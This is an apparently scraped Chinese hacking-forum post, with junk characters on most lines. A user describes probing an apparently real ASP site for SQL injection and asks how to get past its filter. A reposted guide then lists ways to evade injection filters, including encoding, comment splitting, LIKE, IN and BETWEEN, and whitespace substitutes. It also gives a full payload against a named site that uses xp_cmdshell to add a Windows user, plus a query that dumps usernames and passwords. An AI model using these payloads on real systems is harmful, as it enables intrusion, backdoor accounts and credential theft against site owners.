路过这个网站,检测了一下.& V: C1 e3 l. Y7 G
http://www.xxx.cn/Article.asp?ID=117 and 1=1
: M; ~5 e1 w7 T! t! X. F8 t直接返回主页
0 C5 |! m" U' O9 X' @8 I2 Phttp://www.xxx.cn/Article.asp?ID=117 or 1=1$ N" K7 J4 F/ p/ s
直接返回主页8 ]+ W3 P. x$ b8 Q
http://www.xxx.cn/Article.asp?ID=117 or
3 M3 J& }1 e( ~+ E6 _没有返回主页 没有过滤or, z o3 S6 x5 f4 E1 a T
http://www.xxx.cn/Article.asp?ID=117 and
! X& e+ I: Y3 A6 f直接返回主页 看来过滤了and
, l. H5 ~! \8 h: Z& x. Dhttp://www.xxx.cn/Article.asp?ID=117 or 1
; Z5 F1 {! v3 U/ t: q7 x4 @: t$ }没有返回主页 即没有过滤or 也没有过滤1$ x# T% M5 M1 H4 i" c) {
http://www.xxx.cn/Article.asp?ID=117 or 1=1% e% y$ b1 g% w7 g8 J8 P) [1 m5 ?
直接返回主页 很明显过滤了等号
x/ b- e% z* P- Qor的特性是与and相反的.
, w$ J9 o) T por 1=1 爆错 或与原页面不同* G, v6 U" O8 K6 J" T5 f
or 1=2 原页面相同
, {$ }0 z+ J p) D2 S这样就是一个注入点
$ j- @) S9 j) @( l8 @但他过滤了=号 我就用><号代替=号吧!
1 A% |# [- v- J6 v9 e- a2 xor 1<2 很明显是正确的,所以应该与原页面不同6 y) Z, T _7 p3 f' B/ ~9 I6 X
or 1>2 很明显是错误的,所以应该与原页面相同! ?% J* Z) o1 ]/ `5 _. J
然后看看有没有过滤其他的查询语句,比如select.
: B2 |! f) Z5 w2 [2 b$ `0 `5 _ Ohttp://www.xxx.cn/Article.asp?ID=117 select
; h( S6 P7 g5 i* u直接返回主页
5 P: @7 D! k7 F, @9 l( t& z$ O又迷茫了..
6 ]4 j. \4 G1 u: @! [8 V/ T: j$ d. A2 X
m0 A; t% P) Lcookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗
5 f. H2 n9 K& o' E+ w这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
) O+ G9 ~4 ]! p9 f================================================
$ Y% O+ ~ X. W7 z4 f6 Q$ d, g以下是转贴:& T; T0 a o3 w0 v3 f! o
6 a6 h$ B: ?+ _! X; M
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 9 \/ O7 x1 ?" L7 |4 Q
经过我的收集,大部分的防注入程序都过滤了以下关键字:
8 a4 @5 R- I. q; H% H @and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
5 a6 t u# g! w1 m' x5 Q" {5 S而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
# L3 H1 z. _2 C" n# f对于关键字的过滤,以下是我收集的以及我个人的一些想法。
' N/ T# A1 Z% g g! p8 Q4 X1、运用编码技术绕过
6 e1 v% ?0 q$ k' K如URLEncode编码,ASCII编码绕过。例如or 1=1即 " r) m4 s& C" C/ ~9 z- T
%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
& Z) A5 `/ a% S, y
$ I6 N: g2 s/ ?: E; q. q; X2、通过空格绕过
. A9 w3 A& j, [# l6 W; s如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 ) v, P: J) Q9 G) i$ X
or’ swords’ =‘swords’ ! w2 V2 D4 [& K
,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。 ) L" d: Q" q6 g6 q) `! s# a- o% i
3、运用字符串判断代替 2 H- z( o' u# l6 X' j
用经典的or 1=1判断绕过,如 7 j% q5 l1 n" a! i5 ~3 E& W
or ’swords’ =’swords’ 8 H! r$ `# M8 ?6 f \& w, e
,这个方法就是网上在讨论的。
% j; L0 q3 j, V4 a- |! D4、通过类型转换修饰符N绕过 . d- g& `( Y: `1 ~% u- I
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
4 B- K( t0 [7 k/ b$ r: v5、通过+号拆解字符串绕过 ! z1 w, P# D/ A' B
效果值得考证,但毕竟是一种方法。如 7 d' d- U: G8 E2 _
or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) 7 u. a3 x) |% m, O
6 T; M- R" @* t3 F7 A6 Q: ?6、通过LIKE绕过 1 F- Q. q! y/ K
以前怎么就没想到呢?如or
; L; n; e4 k/ S' z' S {8 i’swords’ LIKE ’sw’ ; k* v3 y% ^) [% n
!!!显然可以很轻松的绕过 * N; V& K) V1 J2 ~/ k
“=”“>”
% t, Q P2 \6 t9 k! [的限制…… " p2 Z! E( M8 ^& X+ u
7、通过IN绕过
4 [8 O: n; t' G" J4 ]8 K与上面的LIKE的思路差不多,如 * A6 g, p/ l; Q$ i7 B2 l
or ’swords’ IN (’swords’) & u9 j- g6 z6 i% E, o
+ Q4 ~1 c- W* F8、通过BETWEEN绕过 ; ^6 ?# w9 V( E; [; d$ u2 ^
如 9 K0 ~- f% u( X4 x2 E
or ’swords’ BETWEEN ’rw’ AND ’tw’ % s; q- J4 C6 }$ Y
5 Q: Q& ]' R7 ~9、通过>或者<绕过 8 q2 v- Q) c2 n) _( w. G5 S
or ’swords’ > ’sw’
; T/ f2 R0 _- |4 o( _3 R! Yor ’swords’ < ’tw’ * C4 g' f" d n, B
or 1<3 . b w5 D* M" |
…… : h7 @& s7 d$ Z4 C: Q% m. l
10、运用注释语句绕过 ( M( v4 k9 J, t1 j. | P9 H* J
用/**/代替空格,如: , ~1 W* ` ~, `" Y& T
UNION /**/ Select /**/user,pwd,from tbluser
. T7 k2 N( G% P; j: h( i: j/ x+ v3 R: R3 D$ M
用/**/分割敏感词,如:
- T1 ^4 J/ n$ F: k: lU/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
1 _6 @3 x) H0 N0 j: ~$ ?5 I! {6 Q) h$ _" K+ I& T, h
11、用HEX绕过,一般的IDS都无法检测出来
( q1 c, o; p0 R, \: H u# d0x730079007300610064006D0069006E00 =hex(sysadmin) 0 C; o; F7 J. |8 z! ?7 Z" j
0x640062005F006F0077006E0065007200 =hex(db_owner)
6 C" B3 C# m# {7 k9 z- ]. H6 w另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: - G* O3 g v! f* e0 Q- F
declare @a sysname , W/ L1 y. V- M4 ^ Q
select @a= , \. O5 q( ~- [5 `& k; x. _
exec master.dbo.xp_cmdshell @a
' Z8 a4 ~0 A0 m* E3 F效果
, i+ x9 Y% F5 I0 mhttp://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];-- 5 m; A1 _. ~4 d' p9 G
- V1 v2 f6 C ~: V- c; \/ G
其中的
# Q8 L1 _! `& e: G# ^0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 * s! k' d" Z8 P9 I# j" m
就是 5 K2 o3 g; p7 g- h. t h
“net user angel pass /add”% z* ^# h$ {+ l- h' l
+ c! ]0 |3 Y: o7 ?, g一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。
) L- \2 q4 V3 i# d2 m" Z: ~: U引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。
: ~5 Q: }: w3 R n( A另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似2 P8 A% D& R8 d% P! `5 P5 e
Copy code# b+ M7 {5 Z" T3 V
select * from table exec xp_cmdshell'xxxxxxxxxx'
" D+ h: B" w! b; e; z! z
) {# j$ S# k* k7 O- d
% O% b8 f0 U; u' ^) bselect * from table/**/exec xp_cmdshell'xxxxxxxxxx'
8 ~& z8 p6 x$ J% O. d3 w" l/ {1 j
0 b' a% @, M- S
6 `5 [5 w+ S* t, Y$ K/ H6 C% Bselect * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'
* x1 n f5 q p' K) c: J) {+ t5 N2 H
9 S+ W" [2 l d6 m- v& ] W) {- j$ h# [1 z+ T; D0 m
select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'
+ m7 d: B. W l2 l5 |" u( H7 z$ D/ L3 R
的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?
8 ^, R9 N5 f7 Y" \$ ]) r- F* p, [( `7 [* q
这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了
/ I1 g! f/ P0 }6 b1 T: A可能大家早就知道了,不管怎么说,发在这里吧!2 d+ m! l1 E# q; p5 d! V8 v
. Q" F0 L$ H7 i6 \9 g5 s最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。
! q# ]% q) b: F ~) p
& U, T u$ K4 j: O+ B( G2 n6 e! g* S6 R7 Q7 o `6 n: g- E
/ d6 C6 g$ b/ o2 ]- j' e; ?
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,
t: J: ?. H- A7 {比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? - ?) e8 X9 U Q; Q* k
2 r/ o6 C. r. z# Q. z
|